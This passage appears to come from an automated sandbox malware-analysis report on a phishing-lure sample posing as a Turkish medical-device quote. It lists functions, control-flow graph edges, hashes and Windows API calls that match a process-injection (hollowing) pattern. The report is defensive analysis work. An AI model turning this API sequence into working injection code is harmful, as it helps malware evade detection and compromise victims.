                                                                                                                          control_flow_graph 1610 765839f-76583d7 1612 76583e0-76583e2 1610->1612 1613 76583e4-76583ea 1612->1613 1614 76583fa-7658417 1612->1614 1615 76583ec 1613->1615 1616 76583ee-76583f0 1613->1616 1618 7658582-7658587 1614->1618 1619 765841d-7658513 1614->1619 1615->1614 1616->1614
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8$$q$$q
                                                                                                                          • API String ID: 0-3275118826
                                                                                                                          • Opcode ID: be729c2dd7a6877156c0ac679442140f672f42c97bb29bfbffc95e1f8c4e98b9
                                                                                                                          • Instruction ID: ec2f966b4668e5b107b885ee355c38bbd128998c6300ef39f2c532f3d241024e
                                                                                                                          • Opcode Fuzzy Hash: be729c2dd7a6877156c0ac679442140f672f42c97bb29bfbffc95e1f8c4e98b9
                                                                                                                          • Instruction Fuzzy Hash: 0901F9B0F54307CBE7644B64CC6A7A93772BB60700F188866DD079FB81EAA48C91D792
                                                                                                                          Function 0125B300 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 228COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1622 125b300-125b308 1623 125b2b5-125b2dd 1622->1623 1624 125b30a-125b31f 1622->1624 1637 125b2ec-125b2f4 1623->1637 1638 125b2df-125b2ea 1623->1638 1625 125b321-125b32e call 125acc4 1624->1625 1626 125b34b-125b34f 1624->1626 1633 125b344 1625->1633 1634 125b330 1625->1634 1628 125b351-125b35b 1626->1628 1629 125b363-125b3a4 1626->1629 1628->1629 1639 125b3a6-125b3ae 1629->1639 1640 125b3b1-125b3bf 1629->1640 1633->1626 1685 125b336 call 125b5a8 1634->1685 1686 125b336 call 125b598 1634->1686 1641 125b2f7-125b2fc 1637->1641 1638->1641 1639->1640 1642 125b3c1-125b3c6 1640->1642 1643 125b3e3-125b3e5 1640->1643 1645 125b3d1 1642->1645 1646 125b3c8-125b3cf call 125acd0 1642->1646 1648 125b3e8-125b3ef 1643->1648 1644 125b33c-125b33e 1644->1633 1647 125b480-125b540 1644->1647 1650 125b3d3-125b3e1 1645->1650 1646->1650 1680 125b542-125b545 1647->1680 1681 125b548-125b573 GetModuleHandleW 1647->1681 1651 125b3f1-125b3f9 1648->1651 1652 125b3fc-125b403 1648->1652 1650->1648 1651->1652 1655 125b405-125b40d 1652->1655 1656 125b410-125b419 call 125ace0 1652->1656 1655->1656 1660 125b426-125b42b 1656->1660 1661 125b41b-125b423 1656->1661 1662 125b42d-125b434 1660->1662 1663 125b449-125b44d 1660->1663 1661->1660 1662->1663 1665 125b436-125b446 call 125acf0 call 125ad00 1662->1665 1687 125b450 call 125b861 1663->1687 1688 125b450 call 125b888 1663->1688 1665->1663 1668 125b453-125b456 1670 125b479-125b47f 1668->1670 1671 125b458-125b476 1668->1671 1671->1670 1680->1681 1682 125b575-125b57b 1681->1682 1683 125b57c-125b590 1681->1683 1682->1683 1685->1644 1686->1644 1687->1668 1688->1668
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0125B566
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339707072.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_1250000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 4139908857-2718639967
                                                                                                                          • Opcode ID: c445e86667b61246b7b48c1d62d80558e598e175e20feeefc9f8dcca32315569
                                                                                                                          • Instruction ID: 9cbe6b7e252605fff13fc05c8e7ff2dcea3f0fde9f62d033134d2d48ca2e52ea
                                                                                                                          • Opcode Fuzzy Hash: c445e86667b61246b7b48c1d62d80558e598e175e20feeefc9f8dcca32315569
                                                                                                                          • Instruction Fuzzy Hash: 4C919A70A10B419FE765DF2AD48575ABBF2FF88304F008A2ED986DBA51D734E805CB90
                                                                                                                          Function 012544B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1689 12544b4-12559d9 CreateActCtxA 1692 12559e2-1255a3c 1689->1692 1693 12559db-12559e1 1689->1693 1700 1255a3e-1255a41 1692->1700 1701 1255a4b-1255a4f 1692->1701 1693->1692 1700->1701 1702 1255a51-1255a5d 1701->1702 1703 1255a60 1701->1703 1702->1703 1705 1255a61 1703->1705 1705->1705
                                                                                                                          APIs
                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 012559C9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339707072.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_1250000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Create
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 2289755597-2718639967
                                                                                                                          • Opcode ID: ddbac5b69bf6ce25604ec3c8b7c99586e58c0155ede176cebf4c0ea4048bbafe
                                                                                                                          • Instruction ID: fc83ad94b58d94e30632494982bb3ed0e54cb3fadb059e1229e666a3ede68e8e
                                                                                                                          • Opcode Fuzzy Hash: ddbac5b69bf6ce25604ec3c8b7c99586e58c0155ede176cebf4c0ea4048bbafe
                                                                                                                          • Instruction Fuzzy Hash: D041BF71C10729CBEB24DFAAC884BDDBBF5BF49304F20806AD908AB251DB756945CF90
                                                                                                                          Function 0125590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1706 125590c-12559d9 CreateActCtxA 1708 12559e2-1255a3c 1706->1708 1709 12559db-12559e1 1706->1709 1716 1255a3e-1255a41 1708->1716 1717 1255a4b-1255a4f 1708->1717 1709->1708 1716->1717 1718 1255a51-1255a5d 1717->1718 1719 1255a60 1717->1719 1718->1719 1721 1255a61 1719->1721 1721->1721
                                                                                                                          APIs
                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 012559C9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339707072.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_1250000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Create
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 2289755597-2718639967
                                                                                                                          • Opcode ID: cb7b657d0a9e0187fe1e524ae1831c236e3f3bbd8534d1be03991502cdff0f18
                                                                                                                          • Instruction ID: ba7f51496e2983849dcbb123bbe15d5f3dd2078c0ed1d93c3148531088c83e08
                                                                                                                          • Opcode Fuzzy Hash: cb7b657d0a9e0187fe1e524ae1831c236e3f3bbd8534d1be03991502cdff0f18
                                                                                                                          • Instruction Fuzzy Hash: 2D41CDB5C11729CFEB24CFA9C884B9DBBF5BF49304F20806AD808AB251DB756946CF54
                                                                                                                          Function 079A59E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74injectionCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1722 79a59e0-79a5a36 1725 79a5a38-79a5a44 1722->1725 1726 79a5a46-79a5a85 WriteProcessMemory 1722->1726 1725->1726 1728 79a5a8e-79a5abe 1726->1728 1729 79a5a87-79a5a8d 1726->1729 1729->1728
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 079A5A78
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 3559483778-2718639967
                                                                                                                          • Opcode ID: 0e8f7cca57314ae34e22650ceef41118a03ceee2b3786530ec0a20b7a49ee983
                                                                                                                          • Instruction ID: 7e88d20f1e3437255c851420d86877dc2576c77a51940a5ac5fd2b2aa3109a1c
                                                                                                                          • Opcode Fuzzy Hash: 0e8f7cca57314ae34e22650ceef41118a03ceee2b3786530ec0a20b7a49ee983
                                                                                                                          • Instruction Fuzzy Hash: F22137B6D003199FDB10CFAAC881BDEBBF5FF48314F10842AE918A7241C7789954CBA5
                                                                                                                          Function 079A5AD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1733 79a5ad0-79a5ad4 1734 79a5ad6-79a5b65 ReadProcessMemory 1733->1734 1735 79a5b35-79a5b65 ReadProcessMemory 1733->1735 1737 79a5b6e-79a5b9e 1734->1737 1738 79a5b67-79a5b6d 1734->1738 1735->1737 1735->1738 1738->1737
                                                                                                                          APIs
                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 079A5B58
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 1726664587-2718639967
                                                                                                                          • Opcode ID: e28b86b197ba40641a532924214a5ada63643f5d100c284083caad368d21c3b8
                                                                                                                          • Instruction ID: 00a44eb085fbe528c275578c06507b2fe774c5064fedc2941b3afdf3d60d5f63
                                                                                                                          • Opcode Fuzzy Hash: e28b86b197ba40641a532924214a5ada63643f5d100c284083caad368d21c3b8
                                                                                                                          • Instruction Fuzzy Hash: EB2148B19013099FDF14CFAAC884BEEBBF5FF48314F10842AE554A7641C7759900CBA4
                                                                                                                          Function 079A59E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1744 79a59e8-79a5a36 1746 79a5a38-79a5a44 1744->1746 1747 79a5a46-79a5a85 WriteProcessMemory 1744->1747 1746->1747 1749 79a5a8e-79a5abe 1747->1749 1750 79a5a87-79a5a8d 1747->1750 1750->1749
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 079A5A78
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 3559483778-2718639967
                                                                                                                          • Opcode ID: e52659a7b4ec932c126e567f72abf1c929e5e5d6256d8fa8dc0539ec2bbc8d62
                                                                                                                          • Instruction ID: 5cb6a093097ef31b82c6a1661d792c9af8beaa43d6eb0685acc59e1beb152375
                                                                                                                          • Opcode Fuzzy Hash: e52659a7b4ec932c126e567f72abf1c929e5e5d6256d8fa8dc0539ec2bbc8d62
                                                                                                                          • Instruction Fuzzy Hash: 962126B2D003199FDB14CFAAC881BDEBBF5FF48314F10842AE918A7241C7789950CBA5
                                                                                                                          Function 079A5848 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079A58CE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 983334009-2718639967
                                                                                                                          • Opcode ID: 0c9a5cda3552b13ab8676f58cc1b237da98b3c9cf989947c4787067fdb7eb5ea
                                                                                                                          • Instruction ID: d23cb4e9370c626c2a96a2f2626ef2afa36c715add330429e17e64718f253cfd
                                                                                                                          • Opcode Fuzzy Hash: 0c9a5cda3552b13ab8676f58cc1b237da98b3c9cf989947c4787067fdb7eb5ea
                                                                                                                          • Instruction Fuzzy Hash: B2216AB2D003199FDB14DFAAC481BEEBBF4EF88314F14842AD459A7241C7789945CFA5
                                                                                                                          Function 0125D090 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0125D78E,?,?,?,?,?), ref: 0125D84F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339707072.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_1250000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 3793708945-2718639967
                                                                                                                          • Opcode ID: 7535ee5d5a9c86dd7029a1cf82830ea62f1ab92ce9ecf93512853ccf669e212a
                                                                                                                          • Instruction ID: ae56d515116c5cbc007e779aa7be9d665a6a1e9e4ee12069d10a38bef510cc37
                                                                                                                          • Opcode Fuzzy Hash: 7535ee5d5a9c86dd7029a1cf82830ea62f1ab92ce9ecf93512853ccf669e212a
                                                                                                                          • Instruction Fuzzy Hash: 7C21E3B5D1025DAFDB10CFAAD984ADEBBF4FB48310F14841AE918A7350D378A944CFA5
                                                                                                                          Function 0125D7C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0125D78E,?,?,?,?,?), ref: 0125D84F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339707072.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_1250000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 3793708945-2718639967
                                                                                                                          • Opcode ID: 19dec259ce602f8ec682c02fe9c709a984a92a9db63f845b38de2dc8922e73e1
                                                                                                                          • Instruction ID: bbcdeb2cc6485342f0fa78f471f5844afc948fd71781f0230dd2919506bc1cec
                                                                                                                          • Opcode Fuzzy Hash: 19dec259ce602f8ec682c02fe9c709a984a92a9db63f845b38de2dc8922e73e1
                                                                                                                          • Instruction Fuzzy Hash: 4C2103B5C01248AFDB10CFAAD884ADEBFF5FB48310F14801AE918A3310D374A944CFA5
                                                                                                                          Function 079A5AD8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 079A5B58
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 1726664587-2718639967
                                                                                                                          • Opcode ID: 5aeb678da54541c2570785260916e7b31209719a836759a53f940f3a9181ae86
                                                                                                                          • Instruction ID: 40f2122b4a7831305f4e8ba4677edd04ab8f953363338da36a4f49fe8bc12da3
                                                                                                                          • Opcode Fuzzy Hash: 5aeb678da54541c2570785260916e7b31209719a836759a53f940f3a9181ae86
                                                                                                                          • Instruction Fuzzy Hash: 5A2128B1D003599FDB14CFAAC840BEEBBF5FF48310F10842AE519A7240C7399540CBA5
                                                                                                                          Function 079A5850 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079A58CE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 983334009-2718639967
                                                                                                                          • Opcode ID: 2cd22a9101f4f0d812a69c8ea688ba2be642b7478b0e90381149d44c07178f0c
                                                                                                                          • Instruction ID: f71dc2411dd5a2f9cac6819680b3733d0c19a249728a5fa648058b1fc1a6e266
                                                                                                                          • Opcode Fuzzy Hash: 2cd22a9101f4f0d812a69c8ea688ba2be642b7478b0e90381149d44c07178f0c
                                                                                                                          • Instruction Fuzzy Hash: DD2135B2D003099FDB14DFAAC485BEEBBF4EF88214F14842AD419A7240DB789944CFA5
                                                                                                                          Function 079A5921 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 079A5996
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 4275171209-2718639967
                                                                                                                          • Opcode ID: 68ba3ee45330989bcc6a57839c89a3d5cd6dc8241c24a0270d679ebbe1752e36
                                                                                                                          • Instruction ID: 6070766ce809c2b4b78bcb81b796176ca20a44ef672c7d5d380727612f94847f
                                                                                                                          • Opcode Fuzzy Hash: 68ba3ee45330989bcc6a57839c89a3d5cd6dc8241c24a0270d679ebbe1752e36
                                                                                                                          • Instruction Fuzzy Hash: 6C21A7729043489FCB21CFAAC841BDEBFF5EB88320F24881AE555AB241C7399500CBA5
                                                                                                                          Function 079A5799 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 947044025-2718639967
                                                                                                                          • Opcode ID: e8ba5c7436e7c80061c89cfe3ff3a231b2cab7851fe20710b802eb027946ceb9
                                                                                                                          • Instruction ID: dd8e24957dde6f68ecf559bc74571fb84482249038adfba291d508d08d248f11
                                                                                                                          • Opcode Fuzzy Hash: e8ba5c7436e7c80061c89cfe3ff3a231b2cab7851fe20710b802eb027946ceb9
                                                                                                                          • Instruction Fuzzy Hash: 7B119AB2D043588FDB20DFAAC445BEEFFF4AF88224F24842ED054A7241C7799500CBA5
                                                                                                                          Function 079A5928 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 079A5996
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 4275171209-2718639967
                                                                                                                          • Opcode ID: 9cf5666e0cc8acef77958e65ec5a46a55885e2b173604a99545fa30633aa536f
                                                                                                                          • Instruction ID: 5f04db9718589d82eb45fb521e059748e5249d2738aec2725e8da16cf675d296
                                                                                                                          • Opcode Fuzzy Hash: 9cf5666e0cc8acef77958e65ec5a46a55885e2b173604a99545fa30633aa536f
                                                                                                                          • Instruction Fuzzy Hash: 34115672D003099FDB24DFAAC844BDFBBF5EB88324F10881AE515A7250C7359540CFA5
                                                                                                                          Function 079A8AD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 079A8B35
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePost
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 410705778-2718639967
                                                                                                                          • Opcode ID: 2a8da71c2750de456bd8a6ac705e1eaeaa5827e022ec4a135d8ce098c809c20a
                                                                                                                          • Instruction ID: 3db230b9cbabc0be9bf768afaf8639be38595452bdce39507f4244386aed5232
                                                                                                                          • Opcode Fuzzy Hash: 2a8da71c2750de456bd8a6ac705e1eaeaa5827e022ec4a135d8ce098c809c20a
                                                                                                                          • Instruction Fuzzy Hash: 271125B68003599FDB10CF9AD885BDEFBF8EB48314F14841AE518A7741C375A944CFA5
                                                                                                                          Function 079A57A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 947044025-2718639967
                                                                                                                          • Opcode ID: b70ce608c1be4972e1a623165d59d1d25d2f392ae6a90ef2869c0732922dbe0e
                                                                                                                          • Instruction ID: 051d0929a2656c6708608d57e4db624174badf1076d6ef7dee5157f3a0aae71d
                                                                                                                          • Opcode Fuzzy Hash: b70ce608c1be4972e1a623165d59d1d25d2f392ae6a90ef2869c0732922dbe0e
                                                                                                                          • Instruction Fuzzy Hash: FF1128B1D003598FDB24DFAAC445B9EFBF5EB88214F14841AD419A7640CB79A540CFA5
                                                                                                                          Function 079A40C8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 079A8B35
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePost
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 410705778-2718639967
                                                                                                                          • Opcode ID: eaf097e0d2a36af203a72d65fc05ddae997b31981634c501ee352a79efd85050
                                                                                                                          • Instruction ID: f7b350afb51d362bfb14c12c5bc2ef4436349e6393be06d420d238af44b75f0b
                                                                                                                          • Opcode Fuzzy Hash: eaf097e0d2a36af203a72d65fc05ddae997b31981634c501ee352a79efd85050
                                                                                                                          • Instruction Fuzzy Hash: 0911F5B58003599FDB10CF9AC485BDEBBF8EB48314F10845AE514A7600C375A944CFA5
                                                                                                                          Function 0125B500 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0125B566
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339707072.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_1250000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 4139908857-2718639967
                                                                                                                          • Opcode ID: 60e7a57ce717fb4afe36cf4b2977e8ac5fb0e8cef3456d194f2560f32375e8a7
                                                                                                                          • Instruction ID: 1906dfa74de7f2cba7b8474b9064367be88e90e739aab98334a23365baab7804
                                                                                                                          • Opcode Fuzzy Hash: 60e7a57ce717fb4afe36cf4b2977e8ac5fb0e8cef3456d194f2560f32375e8a7
                                                                                                                          • Instruction Fuzzy Hash: 9D11E0B6C002598FDB24CFAAD444BDEFBF5AB88314F10841AD929B7610C379A545CFA5
                                                                                                                          Function 0765778F Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
